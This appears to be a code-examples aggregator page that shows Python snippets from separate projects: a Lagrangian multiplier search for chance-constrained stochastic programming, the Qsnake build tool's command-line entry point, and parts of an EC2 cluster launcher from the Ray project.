      if verbosity > 0:  print("Initial optimal obj = %s for bL = %s" % (str(zL), str(bL)))

      # fixed = 1 to get PR point at b=1
      lagrUtil.FixAllIndicatorVariables(ph, IndVarName, 1)

      if verbosity > 0:
        print("solve begins %s" % datetime_string())
        print("\t- lambda = %s" % str(lambdaval))
      SolStat, zU = lagrUtil.solve_ph_code(ph, options)
      if verbosity > 0:
        print("solve ends %s" % datetime_string())
        print("\t- status = %s" % str(SolStat))
        print("\t- zU = %s" % str(zU))
      if not SolStat[0:2] == 'ok':
         print(str(SolStat[0:3])+" is not 'ok'")
         addstatus = "** Solution is non-optimal...aborting"
         print(addstatus)
         Result.status = Result.status + "\n" + addstatus
         return Result

      bU = Compute_ExpectationforVariable(ph, IndVarName, CCStageNum)
      if bU < 1.- betaTol and verbosity > 0:
         print("** Warning:  bU = %s  < 1" % str(bU))

### enumerate points in PR space (all but one scenario)
#      Result.lbz = [ [0,bL,zL], [None,bU,zU] ]
#      for scenario in rootnode._scenarios:
#         sname = scenario._name
#         instance = ph._instances[sname]
#         print "excluding scenario",sname
#         getattr(instance,IndVarName).value = 0
#         print sname,"value =",getattr(instance,IndVarName).value,getattr(instance,IndVarName).fixed
#         SolStat, z = lagrUtil.solve_ph_code(ph, options)
#         b = Compute_ExpectationforVariable(ph, IndVarName, CCStageNum)
#         print "solve ends with status =",SolStat,"(b, z) =",b,z
#         getattr(instance,IndVarName).value = 1
#         Result.lbz.append([None,b,z])
#         for t in instance.TimePeriods:
#           print "Global at",t,"=",instance.posGlobalLoadGenerateMismatch[t].value, \
#                '-',instance.negGlobalLoadGenerateMismatch[t].value,"=",\
#                    instance.GlobalLoadGenerateMismatch[t].value,\
#               "\tDemand =",instance.TotalDemand[t].value, ",",\
#                "Reserve =",instance.ReserveRequirement[t].value
#
#      PrintPRpoints(Result.lbz)
#      return Result
#### end enumeration
########################################################################

      if verbosity > 1:
         print("We have bU = %s ...about to free all %s for %d scenarios" % \
                (str(bU), str(IndVarName), len(ScenarioList)))

      # free scenario selection variable
      lagrUtil.FreeAllIndicatorVariables(ph, IndVarName)

      if verbosity > 1:
         print("\tall %s freed; elapsed time = %f" % (str(IndVarName), time.time() - STARTTIME))

# initialize with the two endpoints
      Result.lbz = [ [0.,bL,zL], [None,bU,zU] ]
      Result.selections = [[], ScenarioList]
      NumIntervals = 1
      if verbosity > 0:
         print("Initial relative Lagrangian gap = %f maxIntervals = %d" % (1-zL/zU, maxIntervals))
         if verbosity > 1:
            print("entering while loop %s" % datetime_string())
         print("\n")

############ main loop to search intervals #############
########################################################
      while NumIntervals < maxIntervals:
         lapsedTime = time.time() - STARTTIME
         if lapsedTime > maxTime:
            addstatus = '** max time reached ' + str(lapsedTime)
            print(addstatus)
            Result.status = Result.status + '\n' + addstatus
            break
         if verbosity > 1:
            print("Top of while with %d intervals elapsed time = %f" % (NumIntervals, lapsedTime))
            PrintPRpoints(Result.lbz)

         lambdaval = None
### loop over PR points to find first unfathomed interval to search ###
         for PRpoint in range(1,len(Result.lbz)):
            if Result.lbz[PRpoint][0] == None:
# multiplier = None means interval with upper endpoint at PRpoint not fathomed
               bL = Result.lbz[PRpoint-1][1]
               zL = Result.lbz[PRpoint-1][2]
               bU = Result.lbz[PRpoint][1]
               zU = Result.lbz[PRpoint][2]
               lambdaval = (zU - zL) / (bU - bL)
               break

#############################
# Exited from the for loop
         if verbosity > 1:
            print("exited for loop with PRpoint = %s ...lambdaval = %s" % (PRpoint, lambdaval))
         if lambdaval == None: break # all intervals are fathomed

         if verbosity > 1: PrintPRpoints(Result.lbz)
         if verbosity > 0:
            print("Searching for b in [%s, %s] with %s = %f" % (str(round(bL,4)), str(round(bU,4)), multName, lambdaval))

# search interval (bL,bU)
         lagrUtil.Set_ParmValue(ph, multName,lambdaval)
         if verbosity > 0:
            print("solve begins %s" % datetime_string())
            print("\t- %s = %f" % (multName, lambdaval))

         #########################################################
         SolStat, Lagrangian = lagrUtil.solve_ph_code(ph, options)
         #########################################################
         if not SolStat[0:2] == 'ok':
            addstatus = "** Solution status " + SolStat + " is not optimal"
            print(addstatus)
            Result.status = Result.status + "\n" + addstatus
            return Result

         b = Compute_ExpectationforVariable(ph, IndVarName, CCStageNum)
         z = Lagrangian + lambdaval*b
         if verbosity > 0:
            print("solve ends %s" % datetime_string())
            print("\t- Lagrangian = %f" % Lagrangian)
            print("\t- b = %s" % str(b))
            print("\t- z = %s" % str(z))
            print("\n")

# We have PR point (b,z), which may be new or one of the endpoints
##################################################################

######### Begin tolerance tests ##########
# Test that b is in [bL,bU]
         if verbosity > 1: print("\ttesting b")
         if b < bL - betaTol or b > bU + betaTol:
            addstatus = "** fatal error: probability (= " + str(b) + \
                ") is outside interval, (" + str(bL) + ", " + str(bU) + ")"
            addstatus = addstatus + "\n\t(tolerance = " + str(betaTol) + ")"
            print(addstatus+'\n')
            Result.status = Result.status + addstatus
            return Result
# Test that z is in [zL,zU]
         if verbosity > 1: print("\ttesting z")
# using optTol as absolute tolerance (not relative)
#   ...if we reconsider, need to allow negative z-values
         if z < zL - optTol or z > zU + optTol:
            addstatus = "** fatal error: obj (= " + str(z) + \
                ") is outside interval, (" + str(zL) + ", " + str(zU) + ")"
            print(addstatus+'\n')
            Result.status = Result.status + addstatus
            return Result

# Ok, we have (b,z) in [(bL,zL), (bU,zU)], at least within tolerances

         oldLagrangian = zL - lambdaval*bL
# ensure lambdaval set such that endpoints have same Lagrangian value
# (this is probably unnecessary, but check anyway)
         if abs(oldLagrangian - (zU - lambdaval*bU)) > optTol*abs(oldLagrangian):
            addstatus = "** fatal error: Lagrangian at (bL,zL) = " + \
                str(oldLagrangian) + " not= " + str(zU-lambdaval*bU) + \
                "\n\t(optTol = " + str(optTol) + ")"
            Result.status = Result.status + addstatus
            return Result

# no more fatal error tests...need to know if (b,z) is endpoint or new

         if verbosity > 1: print("No anomalies...testing if b = bL or bU")

# Test if endpoint is an alternative optimum of Lagrangian
# ...using optTol as *relative* tolerance
# (could use other reference values -- eg, avg or max of old and new Lagrangian values)
         refValue =  max( min( abs(oldLagrangian), abs(Lagrangian) ), 1.)
         alternativeOpt = abs( oldLagrangian - Lagrangian ) <= optTol*refValue

# alternativeOpt = True means we computed point (b,z) is alternative optimum such that:
#   case 1: (b,z) = endpoint, in which case we simply fathom [bL,bU] by setting PRpoint
#            to [lambdaval,bU,zU] (the numeric value of multiplier means fathomed)
#   case 2: (b,z) is new PR point on line segment, in which case we split into
#           [bL,b] and [b,bU], with both fathomed

         if verbosity > 1:
            print("oldLagrangian = %s" % str(oldLagrangian))
            if alternativeOpt: print(":= Lagrangian = %s" % str(Lagrangian ))
            else: print("> Lagrangian = %s" % str(Lagrangian))

         if alternativeOpt:
# setting multiplier of (bU,zU) to a numeric fathoms the interval [bL,bU]
            Result.lbz[PRpoint][0] = lambdaval

# test if (b,z) is an endpoint
         newPRpoint = abs(b-bL) > betaTol and abs(b-bU) > betaTol
         if not newPRpoint:
# ...(b,z) is NOT an endpoint (or sufficiently close), so split and fathom
            if verbosity > 1:
               print("\tnot an endpoint\tlbz = %s" % str(Result.lbz[PRpoint]))
            if verbosity > 0:
               print("Lagangian solution is new PR point on line segment of (" \
                  + str(bL) + ", " + str(bU) +")")
               print("\tsplitting (bL,bU) into (bL,b) and (b,bU), both fathomed")
# note:  else ==> b = bL or bU, so we do nothing, having already fathomed [bL,bU]

# (b,z) is new PR point, so split interval (still in while loop)
##########################################
# alternative optimum ==> split & fathom: (bL,b), (b,bU)
         if verbosity > 1:
            print("\talternativeOpt %s newPRpoint = %s" % (alternativeOpt, newPRpoint))
         if newPRpoint:
            NumIntervals += 1
            if alternativeOpt:
               if verbosity > 1: print("\tInsert [lambdaval,b,z] at %f" % PRpoint)
               Result.lbz = Insert([lambdaval,b,z],PRpoint,Result.lbz)
               addstatus = "Added PR point on line segment of envelope"
               if verbosity > 0: print(addstatus+'\n')
            else:
               if verbosity > 1: print("\tInsert [None,b,z] at %f" % PRpoint)
               Result.lbz = Insert([None,b,z],PRpoint,Result.lbz)
               addstatus = "new envelope extreme point added (interval split, not fathomed)"
            Result.status = Result.status + "\n" + addstatus

            if verbosity > 1:
               print("...after insertion:")
               PrintPRpoints(Result.lbz)

# get the selections of new point (ie, scenarios for which delta=1)
            Selections = []
            for scenario in ScenarioList:
               instance = ph._instances[scenario[0]]
               if getattr(instance,IndVarName).value == 1:
                  Selections.append(scenario)
            Result.selections = Insert(Selections,PRpoint,Result.selections)

            if verbosity > 0:
               print("Interval "+str(PRpoint)+", ["+str(bL)+", "+str(bU)+ \
                 "] split at ("+str(b)+", "+str(z)+")")
               print("\tnew PR point has "+str(len(Selections))+" selections")

            if verbosity > 1: print("test that selections list aligned with lbz")
            if not len(Result.lbz) == len(Result.selections):
               print("** fatal error: lbz not= selections")
               PrintPRpoints(Result.lbz)
               print("Result.selections:")
               for i in range(Result.selections): print("%d %f" % (i,Result.selections[i]))
               return Result

# ok, we have split and/or fathomed interval
         if NumIntervals >= maxIntervals:
# we are about to leave while loop due to...
            addstatus = "** terminating because number of intervals = " + \
                    str(NumIntervals) + " >= max = " + str(maxIntervals)
            if verbosity > 0: print(addstatus+'\n')
            Result.status = Result.status + "\n" + addstatus

# while loop continues
         if verbosity > 1:
            print("bottom of while loop")
            PrintPRpoints(Result.lbz)

###################################################
# end while NumIntervals < maxIntervals:
#     ^ this is indentation of while loop
################ end while loop ###################

      if verbosity > 1:  print("\nend while loop...setting multipliers")
      for i in range(1,len(Result.lbz)):
         db = Result.lbz[i][1] - Result.lbz[i-1][1]
         dz = Result.lbz[i][2] - Result.lbz[i-1][2]
         if dz > 0:
            Result.lbz[i][0] = dz/db
         else:
            #print "dz =",dz," at ",i,": ",Result.lbz[i]," -",Result.lbz[i-1]
            Result.lbz[i][0] = 0
      if verbosity > 0: PrintPRpoints(Result.lbz)

      addstatus = '\nLagrange multiplier search ends'+datetime_string()
      if verbosity > 0:
         print(addstatus+'\n')
      Result.status = Result.status + addstatus

      outName = csvPrefix + "PRoptimal.csv"
      with open(outName,'w') as outFile:
         if verbosity > 0:
            print("writing PR points to "+outName+'\n')
         for lbz in Result.lbz:
            outFile.write(str(lbz[1])+ ", " +str(lbz[2])+'\n')

      outName = csvPrefix + "OptimalSelections.csv"
      with open(outName,'w') as outFile:
         if verbosity > 0:
            print("writing optimal selections for each PR point to "+csvPrefix+'PRoptimal.csv\n')
         for selections in Result.selections:
            char = ""
            thisSelection = ""
            for slist in selections:
               if slist:
                  thisSelection = thisSelection + char + slist[0]
                  char = ","
            outFile.write(thisSelection+'\n')

      if verbosity > 0:
         print("\nReturning status:\n %s \n=======================" % Result.status)

################################
      if verbosity > 2:
         print("\nAbout to return...Result attributes: %d" % len(inspect.getmembers(Result)))
         for attr in inspect.getmembers(Result): print(attr[0])
         print("\n===========================================")
# LagrangeParametric ends here
      return Result
################################


####################################### start run ####################################

   AllInOne = False

########################
# options defined here
########################
   try:
      conf_options_parser = construct_ph_options_parser("lagrange [options]")
      conf_options_parser.add_argument("--beta-min",
                                     help="The min beta level for the chance constraint. Default is 0",
                                     action="store",
                                     dest="beta_min",
                                     type=float,
                                     default=0.)
      conf_options_parser.add_argument("--beta-max",
                                     help="The beta level for the chance constraint. Default is 1.",
                                     action="store",
                                     dest="beta_max",
                                     type=float,
                                     default=1.)
      conf_options_parser.add_argument("--beta-tol",
                                     help="Tolerance for testing equality to beta. Default is 1e-5",
                                     action="store",
                                     dest="beta_tol",
                                     type=float,
                                     default=1e-5)
      conf_options_parser.add_argument("--Lagrange-gap",
                                     help="The (relative) Lagrangian gap acceptable for the chance constraint. Default is 10^-4",
                                     action="store",
                                     type=float,
                                     dest="Lagrange_gap",
                                     default=0.0001)
      conf_options_parser.add_argument("--min-prob",
                                     help="Tolerance for testing probability > 0. Default is 1e-9",
                                     action="store",
                                     dest="min_prob",
                                     type=float,
                                     default=1e-5)
      conf_options_parser.add_argument("--max-intervals",
                                     help="The max number of intervals generated; if causes termination, non-fathomed intervals have multiplier=None.  Default = 100.",
                                     action="store",
                                     dest="max_intervals",
                                     type=int,
                                     default=100)
      conf_options_parser.add_argument("--max-time",
                                     help="Maximum time (seconds). Default is 3600.",
                                     action="store",
                                     dest="max_time",
                                     type=float,
                                     default=3600)
      conf_options_parser.add_argument("--lambda-parm-name",
                                     help="The name of the lambda parameter in the model. Default is lambdaMult",
                                     action="store",
                                     dest="lambda_parm_name",
                                     type=str,
                                     default="lambdaMult")
      conf_options_parser.add_argument("--indicator-var-name",
                                     help="The name of the indicator variable for the chance constraint. The default is delta",
                                     action="store",
                                     dest="indicator_var_name",
                                     type=str,
                                     default="delta")
      conf_options_parser.add_argument("--stage-num",
                                     help="The stage number of the CC indicator variable (number, not name). Default is 2",
                                     action="store",
                                     dest="stage_num",
                                     type=int,
                                     default=2)
      conf_options_parser.add_argument("--csvPrefix",
                                     help="Output file name.  Default is ''",
                                     action="store",
                                     dest="csvPrefix",
                                     type=str,
                                     default='')
      conf_options_parser.add_argument("--verbosity",
                                     help="verbosity=0 is no extra output, =1 is medium, =2 is debug, =3 super-debug. Default is 1.",
                                     action="store",
                                     dest="verbosity",
                                     type=int,
                                     default=1)
# The following needed for solve_ph_code in lagrangeutils
      conf_options_parser.add_argument("--solve-with-ph",
                                     help="Perform solves via PH rather than an EF solve. Default is False",
                                     action="store_true",
                                     dest="solve_with_ph",
                                     default=False)
##HG: deleted params filed as deletedParam.py
#######################################################################################################

      options = conf_options_parser.parse_args(args=args)
      # temporary hack
      options._ef_options = conf_options_parser._ef_options
      options._ef_options.import_argparse(options)
   except SystemExit as _exc:
      # the parser throws a system exit if "-h" is specified - catch
      # it to exit gracefully.
      return _exc.code

   # create the reference instances and the scenario tree - no
   # scenario instances yet.
   if options.verbosity > 0:
        print("Loading reference model and scenario tree")
# Dec 18
#   scenario_instance_factory, full_scenario_tree = load_models(options)
   scenario_instance_factory = \
        ScenarioTreeInstanceFactory(options.model_directory,
                                    options.instance_directory)

   full_scenario_tree = \
            GenerateScenarioTreeForPH(options,
                                      scenario_instance_factory)

####
   try:
      if (scenario_instance_factory is None) or (full_scenario_tree is None):
         raise RuntimeError("***ERROR: Failed to initialize the model and/or scenario tree data.")

      # load_model gets called again, so lets make sure unarchived directories are used
      options.model_directory = scenario_instance_factory._model_filename
      options.instance_directory = scenario_instance_factory._scenario_tree_filename

########## Here is where multiplier search is called from run() ############
      Result = LagrangeParametric()
#####################################################################################
   finally:

      # delete temporary unarchived directories
      scenario_instance_factory.close()

   if options.verbosity > 0:
      print("\n===========================================")
      print("\nreturned from LagrangeParametric")
      if options.verbosity > 2:
         print("\nFrom run, Result should have status and ph objects...")
         for attr in inspect.getmembers(Result): print(attr)
         print("\n===========================================")

   try:
     status = Result.status
     print("status = "+str(Result.status))
   except:
     print("status not defined")
     sys.exit()

   try:
      lbz = Result.lbz
      PrintPRpoints(lbz)
      with open(options.csvPrefix+"PRoptimal.csv",'w') as outFile:
         for lbz in Result.lbz:
            outFile.write(str(lbz[1])+ ", " +str(lbz[2])+'\n')
   except:
      print("Result.lbz not defined")
      sys.exit()

   try:
      ScenarioList = Result.ScenarioList
      ScenarioList.sort(key=operator.itemgetter(1))
      with open(options.csvPrefix+"ScenarioList.csv",'w') as outFile:
         for scenario in ScenarioList:
            outFile.write(scenario[0]+", "+str(scenario[1])+'\n')
   except:
      print("Result.ScenarioList not defined")
      sys.exit()

Example 5

Project: qsnake
Source File: qsnake_run.py
View license
def main():
    systemwide_python = (os.environ["QSNAKE_SYSTEMWIDE_PYTHON"] == "yes")
    if systemwide_python:
        print """\
***************************************************
Qsnake is not installed. Running systemwide Python.
Only use this mode to install Qsnake.
***************************************************"""

    parser = OptionParser(usage="""\
[options] [commands]

Commands:

  update                Updates the downloaded packages
  install PACKAGE       Installs the package 'PACKAGE'
  list                  Lists all installed packages
  test                  Runs the Qsnake testsuite
  develop               Equivalent of 'setup.py develop'""")
    parser.add_option("--version",
            action="store_true", dest="version",
            default=False, help="print Qsnake version and exit")
    parser.add_option("-v", "--verbose",
            action="store_true", dest="verbose",
            default=False, help="Make Qsnake verbose")
    parser.add_option("-i", "--install",
            action="store", type="str", dest="install", metavar="PACKAGE",
            default="", help="install a spkg package")
    parser.add_option("-f", "--force",
            action="store_true", dest="force",
            default=False, help="force the installation")
    parser.add_option("-d", "--download_packages",
            action="store_true", dest="download",
            default=False, help="download standard spkg packages")
    parser.add_option("-b", "--build",
            action="store_true", dest="build",
            default=False, help="build Qsnake")
    parser.add_option("-j",
            action="store", type="int", dest="cpu_count", metavar="NCPU",
            default=0, help="number of cpu to use (0 = all), default 0")
    parser.add_option("-s", "--shell",
            action="store_true", dest="shell",
            default=False, help="starts a Qsnake shell")
    parser.add_option("--script",
            action="store", type="str", dest="script", metavar="SCRIPT",
            default=None, help="runs '/bin/bash SCRIPT' in a Qsnake shell")
    # Not much used:
    #parser.add_option("--python",
    #        action="store", type="str", dest="python", metavar="SCRIPT",
    #        default=None, help="runs 'python SCRIPT' in a Qsnake shell")

    # These are not used either:
    #parser.add_option("--unpack",
    #        action="store", type="str", dest="unpack", metavar="PACKAGE",
    #        default=None, help="unpacks the PACKAGE into the 'devel/' dir")
    #parser.add_option("--pack",
    #        action="store", type="str", dest="pack", metavar="PACKAGE",
    #        default=None, help="creates 'devel/PACKAGE.spkg' from 'devel/PACKAGE'")
    #parser.add_option("--devel-install",
    #        action="store", type="str", dest="devel_install", metavar="PACKAGE",
    #        default=None, help="installs 'devel/PACKAGE' into Qsnake directly")
    parser.add_option("--create-package",
            action="store", type="str", dest="create_package",
            metavar="PACKAGE", default=None,
            help="creates 'PACKAGE.spkg' in the current directory using the official git repository sources")
    parser.add_option("--upload-package",
            action="store", type="str", dest="upload_package",
            metavar="PACKAGE", default=None,
            help="upload 'PACKAGE.spkg' from the current directory to the server (for Qsnake developers only)")
    parser.add_option("--release-binary",
            action="store_true", dest="release_binary",
            default=False, help="creates a binary release using the current state (for Qsnake developers only)")
    parser.add_option("--lab",
            action="store_true", dest="run_lab",
            default=False, help="runs lab()")
    parser.add_option("--verify-database",
            action="store_true", dest="verify_database",
            default=False,
            help="verifies the package database integrity")
    parser.add_option("--erase-binary",
            action="store_true", dest="erase_binary",
            default=False,
            help="erases all binaries (keeps downloads)")
    options, args = parser.parse_args()

    if options.verbose:
        global global_cmd_echo
        global_cmd_echo = True
    if len(args) == 1:
        arg, = args
        if arg == "update":
            command_update()
            return
        elif arg == "list":
            command_list()
            return
        elif arg == "develop":
            command_develop()
            return
        elif arg == "test":
            run_tests()
            return
        print "Unknown command"
        sys.exit(1)
    elif len(args) == 2:
        arg1, arg2 = args
        if arg1 == "install":
            try:
                install_package(arg2, cpu_count=options.cpu_count,
                        force_install=options.force)
            except PackageBuildFailed:
                print
                print "Package build failed."
            return
        print "Unknown command"
        sys.exit(1)
    elif len(args) == 0:
        pass
    else:
        print "Too many arguments"
        sys.exit(1)


    if options.download:
        download_packages()
        return
    if options.install:
        try:
            install_package(options.install, cpu_count=options.cpu_count,
                    force_install=options.force)
        except PackageBuildFailed:
            pass
        return
    if options.build:
        build(cpu_count=options.cpu_count)
        return
    if options.shell:
        print "Type CTRL-D to exit the Qsnake shell."
        cmd("cd $CUR; /bin/bash --rcfile $QSNAKE_ROOT/spkg/base/qsnake-shell-rc")
        return
    if options.script:
        setup_cpu(options.cpu_count)
        try:
            cmd("cd $CUR; /bin/bash " + options.script)
        except CmdException:
            print "Qsnake script exited with an error."
        return
    #if options.python:
    #    cmd("cd $CUR; /usr/bin/env python " + options.python)
    #    return
    #if options.unpack:
    #    pkg = pkg_make_absolute(options.unpack)
    #    print "Unpacking '%(pkg)s' into 'devel/'" % {"pkg": pkg}
    #    cmd("mkdir -p $QSNAKE_ROOT/devel")
    #    cmd("cd $QSNAKE_ROOT/devel; tar xjf %s" % pkg)
    #    return
    #if options.pack:
    #    dir = options.pack
    #    if not os.path.exists(dir):
    #        dir = expandvars("$QSNAKE_ROOT/devel/%s" % dir)
    #    if not os.path.exists(dir):
    #        raise Exception("Unknown package to pack")
    #    dir = os.path.split(dir)[1]
    #    print "Creating devel/%(dir)s.spkg from devel/%(dir)s" % {"dir": dir}
    #    cmd("cd $QSNAKE_ROOT/devel; tar cjf %(dir)s.spkg %(dir)s" % \
    #            {"dir": dir})
    #    return
    #if options.devel_install:
    #    dir = options.devel_install
    #    if not os.path.exists(dir):
    #        dir = expandvars("$QSNAKE_ROOT/devel/%s" % dir)
    #    if not os.path.exists(dir):
    #        raise Exception("Unknown package to pack")
    #    dir = os.path.normpath(dir)
    #    dir = os.path.split(dir)[1]
    #    print "Installing devel/%(dir)s into Qsnake" % {"dir": dir}
    #    cmd("mkdir -p $QSNAKE_ROOT/spkg/build/")
    #    cmd("rm -rf $QSNAKE_ROOT/spkg/build/%(dir)s" % {"dir": dir})
    #    cmd("cp -r $QSNAKE_ROOT/devel/%(dir)s $QSNAKE_ROOT/spkg/build/" % \
    #            {"dir": dir})
    #    setup_cpu(options.cpu_count)
    #    cmd("cd $QSNAKE_ROOT/spkg/build/%(dir)s; /bin/bash spkg-install" % \
    #            {"dir": dir})
    #    cmd("rm -rf $QSNAKE_ROOT/spkg/build/%(dir)s" % {"dir": dir})
    #    return
    if options.create_package:
        create_package(options.create_package)
        return
    if options.upload_package:
        upload_package(options.upload_package)
        return
    if options.release_binary:
        release_binary()
        return
    if options.run_lab:
        run_lab()
        return
    if options.verify_database:
        verify_database()
        return
    if options.erase_binary:
        erase_binary()
        return
    if options.version:
        show_version()
        return

    if systemwide_python:
        parser.print_help()
    else:
        start_qsnake()

Example 6

Project: ray
Source File: ec2.py
View license
def launch_cluster(conn, opts, cluster_name):
    if opts.identity_file is None:
        print("ERROR: Must provide an identity file (-i) for ssh connections.", file=stderr)
        sys.exit(1)

    if opts.key_pair is None:
        print("ERROR: Must provide a key pair name (-k) to use on instances.", file=stderr)
        sys.exit(1)

    user_data_content = None

    print("Setting up security groups...")
    master_group = get_or_make_group(conn, cluster_name + "-master", opts.vpc_id)
    slave_group = get_or_make_group(conn, cluster_name + "-slaves", opts.vpc_id)
    authorized_address = opts.authorized_address
    if master_group.rules == []:  # Group was just now created
        master_group.authorize(src_group=master_group)
        master_group.authorize(src_group=slave_group)
        master_group.authorize('tcp', 22, 22, authorized_address)
    if slave_group.rules == []:  # Group was just now created
        slave_group.authorize(src_group=master_group)
        slave_group.authorize(src_group=slave_group)
        slave_group.authorize('tcp', 22, 22, authorized_address)

    # Check if instances are already running in our groups
    existing_masters, existing_slaves = get_existing_cluster(conn, opts, cluster_name,
                                                             die_on_error=False)
    if existing_slaves or (existing_masters and not opts.use_existing_master):
        print("ERROR: There are already instances running in group %s or %s" %
              (master_group.name, slave_group.name), file=stderr)
        sys.exit(1)

    # Use the default Ubuntu AMI.
    if opts.ami is None:
        if opts.region == "us-east-1":
            opts.ami = "ami-2d39803a"
        elif opts.region == "us-west-1":
            opts.ami = "ami-06116566"
        elif opts.region == "us-west-2":
            opts.ami = "ami-9abea4fb"
        elif opts.region == "eu-west-1":
            opts.ami = "ami-f95ef58a"
        elif opts.region == "eu-central-1":
            opts.ami = "ami-87564feb"
        elif opts.region == "ap-northeast-1":
            opts.ami = "ami-a21529cc"
        elif opts.region == "ap-northeast-2":
            opts.ami = "ami-09dc1267"
        elif opts.region == "ap-southeast-1":
            opts.ami = "ami-25c00c46"
        elif opts.region == "ap-southeast-2":
            opts.ami = "ami-6c14310f"
        elif opts.region == "ap-south-1":
            opts.ami = "ami-4a90fa25"
        elif opts.region == "sa-east-1":
            opts.ami = "ami-0fb83963"
        else:
          raise Exception("The specified region is unknown.")

    # we use group ids to work around https://github.com/boto/boto/issues/350
    additional_group_ids = []
    if opts.additional_security_group:
        additional_group_ids = [sg.id
                                for sg in conn.get_all_security_groups()
                                if opts.additional_security_group in (sg.name, sg.id)]
    print("Launching instances...")

    try:
        image = conn.get_all_images(image_ids=[opts.ami])[0]
    except:
        print("Could not find AMI " + opts.ami, file=stderr)
        sys.exit(1)

    # Create block device mapping so that we can add EBS volumes if asked to.
    # The first drive is attached as /dev/sds, 2nd as /dev/sdt, ... /dev/sdz
    block_map = BlockDeviceMapping()
    if opts.ebs_vol_size > 0:
        for i in range(opts.ebs_vol_num):
            device = EBSBlockDeviceType()
            device.size = opts.ebs_vol_size
            device.volume_type = opts.ebs_vol_type
            device.delete_on_termination = True
            block_map["/dev/sd" + chr(ord('s') + i)] = device

    # AWS ignores the AMI-specified block device mapping for M3 (see SPARK-3342).
    if opts.instance_type.startswith('m3.'):
        for i in range(get_num_disks(opts.instance_type)):
            dev = BlockDeviceType()
            dev.ephemeral_name = 'ephemeral%d' % i
            # The first ephemeral drive is /dev/sdb.
            name = '/dev/sd' + string.ascii_letters[i + 1]
            block_map[name] = dev

    # Launch slaves
    if opts.spot_price is not None:
        # Launch spot instances with the requested price
        print("Requesting %d slaves as spot instances with price $%.3f" %
              (opts.slaves, opts.spot_price))
        zones = get_zones(conn, opts)
        num_zones = len(zones)
        i = 0
        my_req_ids = []
        for zone in zones:
            num_slaves_this_zone = get_partition(opts.slaves, num_zones, i)
            slave_reqs = conn.request_spot_instances(
                price=opts.spot_price,
                image_id=opts.ami,
                launch_group="launch-group-%s" % cluster_name,
                placement=zone,
                count=num_slaves_this_zone,
                key_name=opts.key_pair,
                security_group_ids=[slave_group.id] + additional_group_ids,
                instance_type=opts.instance_type,
                block_device_map=block_map,
                subnet_id=opts.subnet_id,
                placement_group=opts.placement_group,
                user_data=user_data_content,
                instance_profile_name=opts.instance_profile_name)
            my_req_ids += [req.id for req in slave_reqs]
            i += 1

        print("Waiting for spot instances to be granted...")
        try:
            while True:
                time.sleep(10)
                reqs = conn.get_all_spot_instance_requests()
                id_to_req = {}
                for r in reqs:
                    id_to_req[r.id] = r
                active_instance_ids = []
                for i in my_req_ids:
                    if i in id_to_req and id_to_req[i].state == "active":
                        active_instance_ids.append(id_to_req[i].instance_id)
                if len(active_instance_ids) == opts.slaves:
                    print("All %d slaves granted" % opts.slaves)
                    reservations = conn.get_all_reservations(active_instance_ids)
                    slave_nodes = []
                    for r in reservations:
                        slave_nodes += r.instances
                    break
                else:
                    print("%d of %d slaves granted, waiting longer" % (
                        len(active_instance_ids), opts.slaves))
        except:
            print("Canceling spot instance requests")
            conn.cancel_spot_instance_requests(my_req_ids)
            # Log a warning if any of these requests actually launched instances:
            (master_nodes, slave_nodes) = get_existing_cluster(
                conn, opts, cluster_name, die_on_error=False)
            running = len(master_nodes) + len(slave_nodes)
            if running:
                print(("WARNING: %d instances are still running" % running), file=stderr)
            sys.exit(0)
    else:
        # Launch non-spot instances
        zones = get_zones(conn, opts)
        num_zones = len(zones)
        i = 0
        slave_nodes = []
        for zone in zones:
            num_slaves_this_zone = get_partition(opts.slaves, num_zones, i)
            if num_slaves_this_zone > 0:
                slave_res = image.run(
                    key_name=opts.key_pair,
                    security_group_ids=[slave_group.id] + additional_group_ids,
                    instance_type=opts.instance_type,
                    placement=zone,
                    min_count=num_slaves_this_zone,
                    max_count=num_slaves_this_zone,
                    block_device_map=block_map,
                    subnet_id=opts.subnet_id,
                    placement_group=opts.placement_group,
                    user_data=user_data_content,
                    instance_initiated_shutdown_behavior=opts.instance_initiated_shutdown_behavior,
                    instance_profile_name=opts.instance_profile_name)
                slave_nodes += slave_res.instances
                print("Launched {s} slave{plural_s} in {z}, regid = {r}".format(
                      s=num_slaves_this_zone,
                      plural_s=('' if num_slaves_this_zone == 1 else 's'),
                      z=zone,
                      r=slave_res.id))
            i += 1

    # Launch or resume masters
    if existing_masters:
        print("Starting master...")
        for inst in existing_masters:
            if inst.state not in ["shutting-down", "terminated"]:
                inst.start()
        master_nodes = existing_masters
    else:
        master_type = opts.master_instance_type
        if master_type == "":
            master_type = opts.instance_type
        if opts.zone == 'all':
            opts.zone = random.choice(conn.get_all_zones()).name
        master_res = image.run(
            key_name=opts.key_pair,
            security_group_ids=[master_group.id] + additional_group_ids,
            instance_type=master_type,
            placement=opts.zone,
            min_count=1,
            max_count=1,
            block_device_map=block_map,
            subnet_id=opts.subnet_id,
            placement_group=opts.placement_group,
            user_data=user_data_content,
            instance_initiated_shutdown_behavior=opts.instance_initiated_shutdown_behavior,
            instance_profile_name=opts.instance_profile_name)

        master_nodes = master_res.instances
        print("Launched master in %s, regid = %s" % (zone, master_res.id))

    # This wait time corresponds to SPARK-4983
    print("Waiting for AWS to propagate instance metadata...")
    time.sleep(15)

    # Give the instances descriptive names and set additional tags
    additional_tags = {}
    if opts.additional_tags.strip():
        additional_tags = dict(
            map(str.strip, tag.split(':', 1)) for tag in opts.additional_tags.split(',')
        )

    for master in master_nodes:
        master.add_tags(
            dict(additional_tags, Name='{cn}-master-{iid}'.format(cn=cluster_name, iid=master.id))
        )

    for slave in slave_nodes:
        slave.add_tags(
            dict(additional_tags, Name='{cn}-slave-{iid}'.format(cn=cluster_name, iid=slave.id))
        )

    # Return all the instances
    return (master_nodes, slave_nodes)

Example 7

Project: ray
Source File: ec2.py
View license
def real_main():
    (opts, action, cluster_name) = parse_args()

    if opts.identity_file is not None:
        if not os.path.exists(opts.identity_file):
            print("ERROR: The identity file '{f}' doesn't exist.".format(f=opts.identity_file),
                  file=stderr)
            sys.exit(1)

        file_mode = os.stat(opts.identity_file).st_mode
        if not (file_mode & S_IRUSR) or not oct(file_mode)[-2:] == '00':
            print("ERROR: The identity file must be accessible only by you.", file=stderr)
            print('You can fix this with: chmod 400 "{f}"'.format(f=opts.identity_file),
                  file=stderr)
            sys.exit(1)

    if opts.instance_type not in EC2_INSTANCE_TYPES:
        print("Warning: Unrecognized EC2 instance type for instance-type: {t}".format(
              t=opts.instance_type), file=stderr)

